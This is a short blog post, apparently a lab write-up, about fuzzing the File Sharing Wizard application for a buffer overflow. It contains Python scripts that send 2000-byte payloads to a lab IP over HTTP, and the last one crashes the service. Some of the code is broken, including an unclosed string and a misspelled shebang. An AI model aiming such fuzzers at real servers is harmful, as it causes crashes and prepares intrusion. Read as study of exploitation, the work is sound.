Daftar Blog Saya

Rabu, 22 Februari 2012

Exploit File Sharing Wizard Application















this time i will try to exploit file sharing wizard application. this aplication use with internet conection so i will get the vulner from wireshark.




making fuzzer
based of wireshark analyzer we will send to application 2000 bytes of data, this fuzzer with python

try 1 :

#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

header='HTTP/1.1\r\n
buffer='A'*2000 + '\r\n\r\n'

sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()

run fuzzer this application, application not crash

try 2 :

#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

header='HTTP/1.1\r\n'
header+='HOST : 239.255.255.250:190\r\n'
buffer='A'*2000 + '\r\n\r\n'

sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()


 i try to modification fuzzer.




#/usr/bin/pythom
import socket

buffer="\x41"*2000
head=('GET %s HTTP/1.1\r\n\r\n') % (buffer)

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.56.105',80))
sock.send(head)
sock.close()

run fuzzer in console and what happen,.....application crash




Tidak ada komentar:

Posting Komentar